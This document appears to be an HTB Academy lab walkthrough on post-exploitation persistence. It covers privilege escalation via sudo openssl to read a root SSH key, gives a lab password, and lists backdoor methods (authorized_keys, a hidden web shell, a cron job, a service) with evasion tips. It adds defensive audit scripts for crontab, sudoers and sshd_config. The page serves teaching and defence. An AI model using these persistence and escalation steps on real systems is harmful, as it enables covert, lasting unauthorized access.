🔒 Post-Exploitation Persistence

🎯 Overview

Post-exploitation persistence ensures stable access after a hard-won initial compromise. Transform unstable reverse shells into persistent SSH access, escalate to root privileges, and establish reliable pivot points for internal Active Directory attacks.

🔒 Establishing Stable Access

🔑 SSH Connection Upgrade

# Leverage discovered credentials for stable access
ssh srvadm@TARGET_IP
Password: ILFreightnixadm!

# Benefits of SSH over reverse shells:
- Stable connection (no timeouts)
- Daily access restoration capability
- Efficient tunneling/pivoting setup
- Professional testing workflow
- Backup access method

📊 System Information Gathering

# Network interface analysis
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-113-generic x86_64)

System information as of [DATE]:
IPv4 address for br-65c448355ed2: 172.18.0.1    # Docker bridge
IPv4 address for docker0:         172.17.0.1    # Docker default
IPv4 address for ens160:          10.129.203.111 # External interface
IPv4 address for ens192:          172.16.8.120   # Internal AD network

# Key observations:
- DMZ positioning with dual interfaces
- Docker environment present
- Internal network connectivity confirmed
- Pivot opportunity into 172.16.8.0/23 scope

🔺 Local Privilege Escalation

πŸ” Privilege Assessment

# Standard privilege escalation checks
id
# Output: uid=1003(srvadm) gid=1003(srvadm) groups=1003(srvadm)

# Sudo privileges enumeration
sudo -l

# Result:
User srvadm may run the following commands on dmz01:
    (ALL) NOPASSWD: /usr/bin/openssl

πŸ› οΈ OpenSSL GTFOBin Exploitation

# GTFOBins reference: https://gtfobins.github.io/gtfobins/openssl/
# Privileged file read capability

# Target: Root SSH private key
LFILE=/root/.ssh/id_rsa
sudo /usr/bin/openssl enc -in $LFILE

# Expected output:
-----BEGIN OPENSSH PRIVATE KEY-----
[BASE64_ENCODED_PRIVATE_KEY]
-----END OPENSSH PRIVATE KEY-----

πŸ” SSH Key Persistence Setup

# 1. Save extracted private key locally
cat > dmz01_root_key << 'EOF'
-----BEGIN OPENSSH PRIVATE KEY-----
[EXTRACTED_PRIVATE_KEY_CONTENT]
-----END OPENSSH PRIVATE KEY-----
EOF

# 2. Set proper permissions
chmod 600 dmz01_root_key

# 3. Test root SSH access
ssh -i dmz01_root_key root@TARGET_IP

# 4. Verify root privileges
root@dmz01:~# id
uid=0(root) gid=0(root) groups=0(root)

🎯 Persistence Benefits Analysis

🚀 Access Advantages

# Stable SSH access provides:
- Immediate daily access restoration
- No complex exploitation chain repetition
- Reliable tunneling/pivoting capabilities
- Professional assessment efficiency
- Backup access redundancy

# Root privileges enable:
- Complete system control
- Advanced persistence mechanisms
- Network configuration access
- Internal reconnaissance capabilities
- Pivot infrastructure deployment

🔄 Alternative Persistence Methods

# SSH key deployment (if no existing keys):
ssh-keygen -t rsa -b 4096
cat ~/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys

# Backdoor web shell placement:
cp webshell.php /var/www/html/.hidden/
chown www-data:www-data /var/www/html/.hidden/webshell.php

# Service manipulation:
systemctl enable custom-backdoor.service
systemctl start custom-backdoor.service

# Scheduled task persistence:
echo "* * * * * root /tmp/.backdoor" >> /etc/crontab
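From the defender's side, the crontab line above is exactly what a scheduled-task audit should catch. The following script is an added example, not part of the HTB Academy lab or its solution: it parses /etc/crontab-style lines and flags commands that reference /tmp, /var/tmp, /dev/shm or a hidden path component. The sample crontab and the path list are constructed assumptions for the demo.

```bash
#!/bin/sh
# Added example (not from the HTB Academy lab): flag system-crontab entries
# whose command touches a world-writable or hidden location, the footprint the
# "Scheduled task persistence" line above leaves behind. The path list and the
# sample crontab below are constructed assumptions for the demo.

# audit_crontab FILE
# Reads /etc/crontab-style lines (min hour dom mon dow user command, or
# @reboot user command) and prints "user command" when the command references
# /tmp, /var/tmp, /dev/shm or a hidden path component such as /.backdoor.
audit_crontab() {
    awk '
        /^[ \t]*#/ || NF == 0 { next }              # comments and blank lines
        /^[A-Za-z_][A-Za-z0-9_]*=/ { next }         # SHELL=, PATH=, MAILTO= ...
        {
            if ($1 ~ /^@/) { user = $2; first = 3 } else { user = $6; first = 7 }
            if (NF < first) next                    # not a complete schedule line
            cmd = $first
            for (i = first + 1; i <= NF; i++) cmd = cmd " " $i
            if (cmd ~ /(^|[^A-Za-z0-9_])\/(tmp|var\/tmp|dev\/shm)\// ||
                cmd ~ /\/\.[^\/. \t]/)
                print user, cmd
        }' "$1"
}

# write_sample_crontab FILE: constructed sample, not the lab host's real file.
# The two run-parts lines are the stock Debian/Ubuntu entries and must not
# be flagged; the last three are the kind of entries persistence leaves.
write_sample_crontab() {
    cat > "$1" <<'EOF'
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root /tmp/.backdoor
0 3 * * * www-data /var/www/html/.hidden/cleanup.sh
@reboot root /dev/shm/.x
EOF
}

# Demo; on a real host also walk /etc/cron.d/* and per-user spools
SAMPLE=$(mktemp)
write_sample_crontab "$SAMPLE"
echo "Suspicious cron entries:"
audit_crontab "$SAMPLE"
rm -f "$SAMPLE"
```

The audit is deliberately path-based rather than keyword-based: a persistence binary can be named anything, but it still has to live somewhere the attacker could write, and that location is what gives it away.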

🌐 Network Position Assessment

📊 DMZ Host Analysis

# Network topology understanding:
External Network (10.129.x.x) → DMZ (dmz01) → Internal Network (172.16.8.0/23)

# Host role identification:
- Web services hosting (monitoring, dev applications)
- Network boundary device
- Dual-homed system (external + internal)
- Pivot point into corporate environment

# Service enumeration:
ps aux | grep -v "]"          # Running processes (kernel threads in [brackets] filtered out)
netstat -antup                # Listening ports and active connections
systemctl list-units --type=service  # System services

🎯 Internal Network Preparation

# Network discovery preparation:
ip route                      # Routing table analysis
arp -a                        # ARP table enumeration
cat /etc/resolv.conf          # DNS configuration
cat /etc/hosts                # Static host entries

# Pivot planning:
- SSH tunneling capabilities
- Port forwarding setup
- SOCKS proxy configuration
- Internal reconnaissance staging

πŸ›‘οΈ Operational Security

🔒 Access Maintenance

# Best practices:
- Save private keys securely (encrypted storage)
- Document access credentials
- Test backup access methods
- Monitor for account changes
- Plan for credential rotation

# Risk mitigation:
- Use non-obvious persistence methods
- Avoid high-visibility modifications
- Clean up temporary files
- Document all system changes

📋 Pivot Preparation Checklist

# Pre-pivot requirements:
✅ Stable SSH access established
✅ Root privileges confirmed
✅ Network interfaces mapped
✅ Internal network connectivity verified
✅ Backup access methods deployed

# Next phase preparation:
- Internal network scanning
- Active Directory enumeration
- Domain controller identification
- Service account discovery
- Lateral movement planning

🎯 HTB Academy Lab

📋 Lab Solution Summary

# Persistence establishment chain:
1. SSH connection → srvadm:ILFreightnixadm!
2. Sudo enumeration → /usr/bin/openssl NOPASSWD
3. GTFOBin exploitation → privileged file read
4. SSH key extraction → /root/.ssh/id_rsa
5. Root access establishment → stable persistence
6. Flag retrieval → /root/flag.txt

# Key techniques demonstrated:
- Credential reuse for stable access
- GTFOBins privilege escalation
- SSH key-based persistence
- Professional access maintenance

πŸ” Learning Objectives

# Technical skills:
- GTFOBins exploitation techniques
- SSH key-based persistence methods
- Privilege escalation validation
- Network position assessment

# Professional methodology:
- Stable access prioritization
- Backup access planning
- Documentation standards
- Operational security practices

# Real-world application:
- DMZ compromise scenarios
- Persistence in enterprise environments
- Internal network pivot preparation
- Long-term access maintenance

πŸ›‘οΈ Defensive Recommendations

🔒 System Hardening

# Sudo configuration:
- Remove unnecessary NOPASSWD entries
- Implement least privilege principles
- Regular sudo access audits
- Command logging and monitoring
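The `sudo -l` finding earlier on this page (`(ALL) NOPASSWD: /usr/bin/openssl`) is the kind of entry the first bullet above is about. The script below is an added example, not part of the HTB Academy lab or its solution: it walks a sudoers file and reports NOPASSWD rules whose command is a binary that can read or write arbitrary files when run as root. The WATCHLIST is an illustrative assumption (openssl comes from this lab, the rest are other well-known GTFOBins entries), and the sample sudoers file is constructed for the demo.

```bash
#!/bin/sh
# Added example (not from the HTB Academy lab): audit a sudoers file for
# NOPASSWD rules that hand out binaries capable of reading or writing
# arbitrary files as root. WATCHLIST is an illustrative assumption; openssl
# is the one from this lab, the others are further well-known GTFOBins
# entries. Extend it for your own estate.

WATCHLIST="openssl vim vi less more find awk python3 perl tar"

# audit_sudoers FILE
# Prints "user command" for every NOPASSWD rule whose command is on the
# watchlist, or "user ALL" for a blanket passwordless rule.
audit_sudoers() {
    awk -v watch="$WATCHLIST" '
        /^[ \t]*#/ || NF == 0 { next }          # comments and blank lines
        /NOPASSWD:/ {
            user = $1
            sub(/.*NOPASSWD:[ \t]*/, "")         # keep only the command list
            n = split($0, cmds, /[ \t]*,[ \t]*/)
            for (i = 1; i <= n; i++) {
                cmd = cmds[i]
                sub(/[ \t].*$/, "", cmd)         # drop any fixed arguments
                if (cmd == "ALL") { print user, "ALL"; continue }
                base = cmd
                sub(/.*\//, "", base)            # basename of the command
                if (index(" " watch " ", " " base " ") > 0) print user, cmd
            }
        }' "$1"
}

# sudoers_is_clean FILE: succeeds (exit 0) when the audit finds nothing
sudoers_is_clean() {
    [ -z "$(audit_sudoers "$1")" ]
}

# write_sample_sudoers FILE: constructed sample, not the lab host's real file.
# The srvadm rule mirrors the one found with sudo -l on dmz01.
write_sample_sudoers() {
    cat > "$1" <<'EOF'
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
srvadm  ALL=(ALL) NOPASSWD: /usr/bin/openssl
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/tar
deploy  ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app
EOF
}

# Demo; on a real host point audit_sudoers at /etc/sudoers and /etc/sudoers.d/*
SAMPLE=$(mktemp)
write_sample_sudoers "$SAMPLE"
echo "Risky NOPASSWD rules:"
audit_sudoers "$SAMPLE"
rm -f "$SAMPLE"
```

Running the demo reports the srvadm/openssl rule and the backup/tar rule while leaving the pinned `systemctl restart app` rule alone, which is the distinction a review wants: passwordless sudo is tolerable for a fixed, narrow command, not for a general-purpose binary.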

# SSH security:
- Disable root SSH access
- Implement key-based authentication only
- Use SSH certificates instead of keys
- Monitor SSH access logs
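The first two SSH bullets map to `PermitRootLogin` and `PasswordAuthentication` in sshd_config. The script below is an added example, not part of the HTB Academy lab or its solution: it reports the value sshd would actually apply for each and shows the weak configuration beside the corrected one. It follows sshd's own rule that the first value read for a keyword wins (later duplicates are ignored) and treats anything inside a `Match` block as conditional, so it stops there. The defaults it assumes when a keyword is absent are OpenSSH's (PermitRootLogin prohibit-password, PasswordAuthentication yes); both sample files are constructed.

```bash
#!/bin/sh
# Added example (not from the HTB Academy lab): check the two sshd_config
# settings this lab's root persistence depended on. sshd applies the FIRST
# value it reads for a keyword and ignores later duplicates, so the check
# does the same; directives inside Match blocks are conditional and are not
# evaluated. Defaults for absent keywords are OpenSSH's own. Both sample
# configs are constructed.

# sshd_effective FILE KEYWORD DEFAULT
# Prints the value sshd applies globally: the first match before any Match
# block, lower-cased, or DEFAULT when the keyword is not set.
sshd_effective() {
    val=$(awk -v key="$2" '
        /^[ \t]*#/ || NF == 0 { next }
        tolower($1) == "match"      { exit }         # global section ended
        tolower($1) == tolower(key) { print $2; exit }
    ' "$1" | tr 'A-Z' 'a-z')
    printf '%s\n' "${val:-$3}"
}

# audit_sshd FILE
# Prints "Keyword current -> recommended" for each weak setting; returns 1
# if any were found, 0 when the file is clean.
audit_sshd() {
    weak=0
    root=$(sshd_effective "$1" PermitRootLogin prohibit-password)
    if [ "$root" != "no" ]; then
        echo "PermitRootLogin $root -> no"; weak=1
    fi
    pw=$(sshd_effective "$1" PasswordAuthentication yes)
    if [ "$pw" != "no" ]; then
        echo "PasswordAuthentication $pw -> no"; weak=1
    fi
    return $weak
}

# Constructed weak config: root may log in, passwords accepted, and a later
# duplicate that looks like a fix but is ignored by sshd.
write_weak_sshd() {
    cat > "$1" <<'EOF'
Port 22
PermitRootLogin yes
PasswordAuthentication yes
# sshd ignores this later duplicate - the first value above wins
PermitRootLogin no
Match User backup
    PasswordAuthentication no
EOF
}

# Constructed hardened config: the corrected settings.
write_hardened_sshd() {
    cat > "$1" <<'EOF'
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
EOF
}

# Demo; on a real host run: audit_sshd /etc/ssh/sshd_config
for gen in write_weak_sshd write_hardened_sshd; do
    f=$(mktemp)
    "$gen" "$f"
    echo "== $gen =="
    audit_sshd "$f" && echo "(clean)"
    rm -f "$f"
done
```

Note that the weak sample is flagged even though it contains `PermitRootLogin no`: the earlier `yes` is what sshd enforces, which is why a grep for the "right" line is not a sufficient check.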

# File system protection:
- Restrict access to sensitive files
- Implement file integrity monitoring
- Regular permission audits
- Secure backup storage
